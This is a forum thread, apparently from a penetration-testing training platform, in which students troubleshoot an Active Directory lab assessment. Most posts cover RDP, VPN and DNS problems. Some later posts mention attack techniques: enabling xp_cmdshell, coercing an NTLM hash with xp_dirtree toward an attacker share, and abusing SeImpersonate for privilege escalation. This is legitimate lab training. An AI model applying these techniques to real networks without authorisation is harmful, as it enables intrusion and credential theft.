Active Directory - Skills Assessment II

Rapunzel3000 · October 24, 2022, 12:33pm

Evil-Winrm does not cut it for extended AD enumeration.
Your issues with RDP-connectivity are most likely VPN-related (also in Pwnbox).
Renew you VPN to a different region, clear your browser and give it another try!

19delta4u · October 24, 2022, 3:45pm

Yes. I spent 2 days trying to RDP through the Parrot VM and also to work the lab without RDP. I then tried OpenVPN and RDP worked fine from my Kali machine at home! It seems that Pwnbox is misconfigured (x11 problem) so OpenVPN is the way to go. I’ve been using Pwnbox up until this point with many headaches. From now on I’m using OpenVPN.

19delta4u · October 24, 2022, 7:29pm

Okay. So my RDP problem was an issue with the Parrot VM. By using OpenVPN on my Kali box at home, I didn’t have any issues access the lab. It was easy peasy once I could RDP into MS01.

Hit me up if you get stuck! I wrote up a complete walkthrough.

iamjaydee · October 30, 2022, 3:59pm

If You encounter this kind of a problem it’s mostly due to not forwarding Your X’s.

Exit from current SSH, and then reconnect with -X parameter ie. ssh user@127.0.0.1 -X
This should let You RDP from within SSH connection

19delta4u · October 30, 2022, 5:20pm

@iamjaydee Thank you! I will investigate your suggestion.

tolisvs7 · November 4, 2022, 10:38pm

So did you find any way?

cyb3rj3d1 · November 6, 2022, 7:17am

Hello, guys. I am trying to connect to SQL01 with mssqlclient.py
mssqlclient.py -p 1433 SQLEXPRESS/n****:'D***_****_******'@SQL01 -windows-auth
but receiving Temporary failure in name resolution. Could somebody tell me what I am doing wrong?

Ezi0 · November 15, 2022, 8:16pm

Hi, I need help on question 7 → " Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host."

I have tried:

Enable xp_cmdshell to execute commands, but I don’t have access to access C:\UsersAdministratorDesktop.
I have tried impersonating another user within MSSQL, but I get no results. I have used the commands:

Also, I mounted a share on the attacker machine to capture the hash and from MSSQL I ran “EXEC master…xp_dirtree '\IP_attacker\share”, but to no avail.

Rapunzel3000 · November 15, 2022, 8:49pm

What else could you do with the SeImpersonate Privilege?
Have a look at Privilege Escalation!

Rapunzel3000 · November 15, 2022, 8:56pm

Your Kali Box has to know how to resolve the address of SQL01.

You might try editing resolv.conf

$ cat /etc/resolv.conf 

#nameserver 192.168.195.2
domain inlanefreight.local
domain localdomain
search localdomain
nameserver <DC IP>

Ezi0 · November 16, 2022, 10:14am

Thank you @Rapunzel3000 . In case it helps anyone, I have read the section “SeImpersonate and SeAssignPrimaryToken” of the module “Windows Privilege Escalation”. It is important to know if Windows Server is 2016 or 2019.

stellar · November 29, 2022, 12:51pm

hi 19delta4u,experiencing the same issue,either through the OpenVPN with the display variable